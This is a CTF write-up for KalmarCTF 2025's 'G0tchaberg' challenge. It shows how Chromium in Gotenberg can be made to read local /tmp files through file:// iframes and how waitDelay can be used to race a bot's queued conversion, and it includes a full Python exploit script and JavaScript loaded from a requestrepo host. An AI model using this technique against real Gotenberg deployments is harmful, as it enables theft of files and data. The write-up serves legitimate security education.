G0tchaberg

Posted Mar 14, 2025 Updated Mar 16, 2025

By Marios Kailis

11 min read


Description

Can you steal the flag, even though I’m using the latest version of https://github.com/gotenberg/gotenberg?

Individual instances can be started at the link below:

https://lab1.kalmarc.tf/

Solution

Initial Look

We are given the source code of the application. There are four files: Dockerfile, compose.yml, entrypoint.sh, and index.html.

Dockerfile

We can see that the image is based on alpine:latest and installs curl. The entrypoint.sh script and index.html are copied to the /app directory, and entrypoint.sh is run when the container starts.

  
FROM alpine:latest

RUN apk add --no-cache curl

WORKDIR /app

COPY entrypoint.sh index.html ./
RUN chmod +x entrypoint.sh

CMD ["./entrypoint.sh"]

entrypoint.sh

We can see that the script sends a POST request to http://gotenberg:3000/forms/chromium/convert/html with the index.html file as form data, waiting 5 seconds between requests. The output is saved as output.pdf.

  
#!/bin/sh

while true; do
    curl -s 'http://gotenberg:3000/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf
    sleep 5
done

index.html

This is the file that contains the flag.

  
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Flag</title>
</head>
<body>
	<h1>Very private information!</h1>
    <h2>kalmar{test_flag}</h2>
</body>
</html>

compose.yml

This file is used to start the application. It starts the gotenberg service and the flagbot service. The flagbot service depends on the gotenberg service.

  
services:
  gotenberg:
    restart: unless-stopped
    image: gotenberg/gotenberg:latest # https://gotenberg.dev/
    ports:
      - "8642:3000"
    networks:
      - local

  flagbot:
    restart: unless-stopped
    build: ./flagbot
    depends_on:
      - gotenberg
    networks:
      - local

networks:
  local:

Gotenberg

Gotenberg provides a developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more! Thanks to Docker, you don’t have to install each tool in your environments; drop the Docker image in your stack, and you’re good to go!

By reading the documentation of Gotenberg, we find all the available routes.

Let’s try to convert an HTML file to a PDF file using the /forms/chromium/convert/html route.

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

  
<html>
<body>
    <h1>MariosK1574</h1>    
</body>
</html>

It works!

Digging Deeper

So far we have no idea how to get the flag. Let’s see if there are any known vulnerabilities or open issues with Gotenberg.

We came across this issue

So we have local file read under the /tmp directory. We still don’t know how this can help us. What is stored in the /tmp directory?

Let’s hop into the container and find out more.

We can see there are 2 directories, with random UUIDs as names. One has information about the browser and the other is empty. One thing we notice is that in the empty directory, we see another directory being created for an instant and then being deleted. This is happening every 5 seconds. This is the same time interval as the entrypoint.sh script.

Let’s read the documentation again and try to find an option that would allow us to delay the deletion of the temporary files.

Wait Before Rendering

We notice that there is an option called waitDelay that makes Chromium wait for a given duration after loading an HTML document before converting it to a PDF.

Let’s send a request with the waitDelay option and take another look at /tmp.

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' --form 'waitDelay=15s' -o ./output.pdf

Hmmm, this is very interesting. We list the files in the directory and we just see 1 directory, and then we list it once again a few seconds later and we see 2 directories. Let’s send another request and check the contents of the directories.

We can see that in the first directory, there is the original index.html we sent, and in the second directory, there is the index.html containing the flag.

Now we start to understand how gotenberg works.

Exploitation

Chromium Queue

From our experiments, we got a grasp of how the Chromium queue works in Gotenberg. Every request sent to the Chromium service is added to a queue. For each request in the queue, a new directory is created with a random UUID as its name, and the original documents to be converted are stored in that directory. Requests are processed one at a time. After a request is processed and the document is converted to PDF, the directory is deleted and the PDF is sent back to the user. Finally, the request is removed from the queue and the next request is processed.
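To make the consequence of this behaviour concrete, here is a small toy model of the queue as we understand it. It is only a sketch of what we observed, not Gotenberg's actual implementation: the `Request` class, the function names, and the arrival times and durations are all made up for illustration. It assumes a request's directory exists from the moment the request arrives until its conversion finishes.

```python
from dataclasses import dataclass


@dataclass
class Request:
    name: str
    arrival: float   # second at which the request reaches the API (made up)
    duration: float  # seconds Chromium spends on it, roughly its waitDelay


def directory_lifetimes(requests):
    """Return {name: (created_at, deleted_at)} for a one-at-a-time queue."""
    lifetimes = {}
    chromium_free_at = 0.0
    for req in sorted(requests, key=lambda r: r.arrival):
        # A request starts only once the previous conversion has finished.
        start = max(req.arrival, chromium_free_at)
        chromium_free_at = start + req.duration
        # Assumption: the directory is created on arrival, deleted on completion.
        lifetimes[req.name] = (req.arrival, chromium_free_at)
    return lifetimes


def alive_at(lifetimes, t):
    """Names of the request directories that exist at time t."""
    return [name for name, (created, deleted) in lifetimes.items()
            if created <= t < deleted]


requests_in_flight = [
    Request("ours", arrival=0.0, duration=15.0),    # sent with waitDelay=15s
    Request("flagbot", arrival=2.0, duration=0.5),  # arrives while ours renders
]
lifetimes = directory_lifetimes(requests_in_flight)
print(lifetimes)
print(alive_at(lifetimes, 10.0))
```

In this model the flagbot directory sits on disk for as long as our slow request keeps Chromium busy, which is the window the rest of the attack relies on.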

File Read

Let’s create a temporary file (“Hello World!”) in the /tmp directory and try to read it.

  
<iframe src="file:///tmp/test.txt"></iframe>

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

We can see that the file is read successfully. Let’s also try to list the contents of the /tmp directory.

  
<iframe src="file:///tmp/" width="100%" height="100%"></iframe>

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

We can see that the contents of the /tmp directory are listed successfully.
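Since both tests use the same page with a different path, the payload can be generated instead of edited by hand. The helper below is a minimal sketch; the function name `iframe_payload` and the default sizes are our own choices for illustration and are not part of Gotenberg.

```python
from html import escape


def iframe_payload(path, width=1000, height=1000):
    """Build an HTML document whose only content is an iframe on a file:// URL."""
    # path is an absolute path inside the Gotenberg container, e.g. "/tmp/".
    src = escape(f"file://{path}", quote=True)
    return (
        "<!doctype html>\n"
        "<html>\n"
        "<body>\n"
        f'    <iframe src="{src}" width="{width}" height="{height}"></iframe>\n'
        "</body>\n"
        "</html>\n"
    )


print(iframe_payload("/tmp/"))          # directory listing
print(iframe_payload("/tmp/test.txt"))  # single file
```

The returned string can be saved as index.html and sent with the same curl command as before.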

So far we know the following:

We can list the contents of the /tmp directory
We can read files in the /tmp directory
We know the flag is stored in the /tmp directory
We can delay the deletion of the temporary files, allowing us to read the flag

Let the Magic Begin

When we start thinking about the attack chain, we immediately run into a problem. We can send a delayed request that lists the directories and gives us the UUID of the directory containing the flag, but as soon as that request finishes, the flag is deleted. We would have the correct UUID, but a follow-up request to read the flag would find nothing there.

After some brainstorming, we come up with the following attack chain:

Send a request to list the contents of the /tmp directory to get the UUID of the empty directory.

  
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>

Send a request to list the contents of the empty directory to get the UUID of the directory that contains the flag. This request contains an iframe that loads the empty directory. We add a delay to the request so that the other requests have enough time to enter the queue. This is the 1st request in the queue.

  
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var uuid = '';
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>

Immediately send a request to read the flag. This request contains a script tag that loads a script hosted on our server, and that script dynamically creates an iframe that loads the flag. We add a delay to the request so that we have enough time to process the previous requests, extract the UUIDs from the PDF, and update the script. This is the 2nd request in the queue.

  
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = 'https://t9gk8ph0.requestrepo.com/main.js';
            document.head.appendChild(script);

        }, 15000);
    </script>
  </body>
</html>

  
var uuid1 = '';
var uuid2 = '';
var iframe = document.createElement('iframe');
iframe.src = `file:///tmp/${uuid1}/${uuid2}/index.html`;
iframe.height = 1000;
iframe.width = 1000;
document.body.appendChild(iframe);

The flagbot service sends its request to convert the index.html file containing the flag to a PDF. This is the 3rd request in the queue.

Automated Python Script

We implemented the attack chain in a Python script. It uses requestrepo to host the remote script (main.js).

Note: You may have to run the script 3-4 times, since we haven’t found a way to identify with certainty which UUID from the 3 we get is the correct one.

  
import requests
import fitz
import re
from io import BytesIO
from requestrepo import Requestrepo
import concurrent.futures
import time

base_url = "https://9848daeb59d6995c04676fa4311bc27f-51763.inst1.chal-kalmarc.tf"
url = f"{base_url}/forms/chromium/convert/html"
requestrepo_url = "" # Your requestrepo url
token = "" # Your requestrepo token

uuid_pattern = r"\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b"

stages = [
    {
        "name": "Stage-1",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>""",
        "waitDelay": "1s"
    },
    {
        "name": "Stage-2",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var uuid = '{uuid1}';  // Insert uuid1 here
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    },
    {
        "name": "Stage-3",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = '"""+requestrepo_url+"""main.js';
            document.head.appendChild(script);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    }
]

def extract_uuids_from_pdf(pdf_data):
    pdf_stream = BytesIO(pdf_data)
    doc = fitz.open(stream=pdf_stream, filetype="pdf")

    extracted_text = "\n".join([page.get_text("text") for page in doc])

    uuids = re.findall(uuid_pattern, extracted_text)
    
    return uuids, extracted_text

def process_stage(stage, uuid1=None, uuid2=None, uuid3=None, uuid4=None):
    print(f"\n🚀 Sending {stage['name']} request...")

    if(stage["name"] == "Stage-3"):
        time.sleep(1)

    html_content = stage["html"]
    if uuid1:
        html_content = html_content.replace("{uuid1}", uuid1)
    if uuid2:
        html_content = html_content.replace("{uuid2}", uuid2)
    if uuid3:
        html_content = html_content.replace("{uuid3}", uuid3)
    if uuid4:
        html_content = html_content.replace("{uuid4}", uuid4)

    files = {"files": ("index.html", html_content, "text/html")}
    data = {"waitDelay": stage["waitDelay"]}

    response = requests.post(url, files=files, data=data)

    if response.status_code == 200:
        pdf_data = response.content

        uuids, extracted_text = extract_uuids_from_pdf(pdf_data)

        print(f"\n📝 Extracted Text from {stage['name']} PDF:\n")
        print(extracted_text)

        if uuids:
            print("\n🔍 Extracted UUIDs:")
            for uuid in uuids:
                print(uuid)
            return uuids
        else:
            print("\n❌ No UUIDs found in the extracted text.")
            return None
    else:
        print(f"⚠️ Error: Received status code {response.status_code}")
        print(f"⚠️ Error: Received response content {response.content}")
        return None

def update_requestrepo(uuids):
    client = Requestrepo(token=token, host="requestrepo.com", port=443, protocol="https")

    if len(uuids) >= 3:
        script_content = f"""
        var uuid1 = '{uuids[0]}';
        var uuid2 = '{uuids[2]}';
        var iframe = document.createElement('iframe');
        iframe.src = `file:///tmp/${{uuid1}}/${{uuid2}}/index.html`;
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
        """
        
        client.update_http(raw=script_content.encode())
        client.update_http(headers={"Content-Type": "application/javascript"})
        print("\n✅ main.js updated with the UUIDs.")
    else:
        print("❌ Not enough UUIDs to update main.js.")

def test_stages_concurrently():
    print("🚀 Starting Stage-1...")
    uuids_stage_1 = process_stage(stages[0])

    if uuids_stage_1:
        uuid1 = uuids_stage_1[1]
        print(f"🔑 Extracted UUID from Stage-1: {uuid1}")

        with concurrent.futures.ThreadPoolExecutor() as executor:
            future_stage_2 = executor.submit(process_stage, stages[1], uuid1)
            future_stage_3 = executor.submit(process_stage, stages[2], uuid1)

            uuids_stage_2 = future_stage_2.result()
            if uuids_stage_2:
                print("\n🔑 Extracted UUIDs from Stage-2:")
                for uuid in uuids_stage_2:
                    print(uuid)
                update_requestrepo(uuids_stage_2)

            uuids_stage_3 = future_stage_3.result()
            if uuids_stage_3:
                print("\n🔑 Extracted UUIDs from Stage-3:")
                for uuid in uuids_stage_3:
                    print(uuid)

                uuids = uuids_stage_2 + uuids_stage_3
                print("\n🔑 Combined UUIDs extracted from Stage-2 and Stage-3:")
                for uuid in uuids:
                    print(uuid)

if __name__ == "__main__":
    test_stages_concurrently()

Dependencies:

pip install PyMuPDF requestrepo requests
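One idea for avoiding the reruns mentioned in the note above, which we have not tested against the challenge, is to have main.js create one iframe per candidate UUID instead of guessing a single one. The sketch below only generates the JavaScript. The function name `build_main_js` and the placeholder values are hypothetical, and it assumes Chromium renders every iframe before the waitDelay expires.

```python
import json


def build_main_js(parent_uuid, candidate_uuids):
    """Return JavaScript that adds one iframe per candidate request directory."""
    urls = [f"file:///tmp/{parent_uuid}/{candidate}/index.html"
            for candidate in candidate_uuids]
    return (
        # json.dumps produces a valid JavaScript array literal of strings.
        f"var urls = {json.dumps(urls)};\n"
        "urls.forEach(function (url) {\n"
        "    var iframe = document.createElement('iframe');\n"
        "    iframe.src = url;\n"
        "    iframe.height = 300;\n"
        "    iframe.width = 1000;\n"
        "    document.body.appendChild(iframe);\n"
        "});\n"
    )


# Placeholder values, not real UUIDs from the challenge.
print(build_main_js("PARENT-UUID", ["CANDIDATE-1", "CANDIDATE-2", "CANDIDATE-3"]))
```

If this were wired into the script, the returned string would replace script_content in update_requestrepo, with the first extracted UUID as the parent and the remaining ones as candidates.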

Flag

The flag is kalmar{g0tcha!_well_done_that_was_fun_wasn't_it?_we_would_appreciate_if_you_create_a_ticket_with_your_solution}.

CTF Writeups, KalmarCTF 2025

web

This post is licensed under CC BY 4.0 by the author.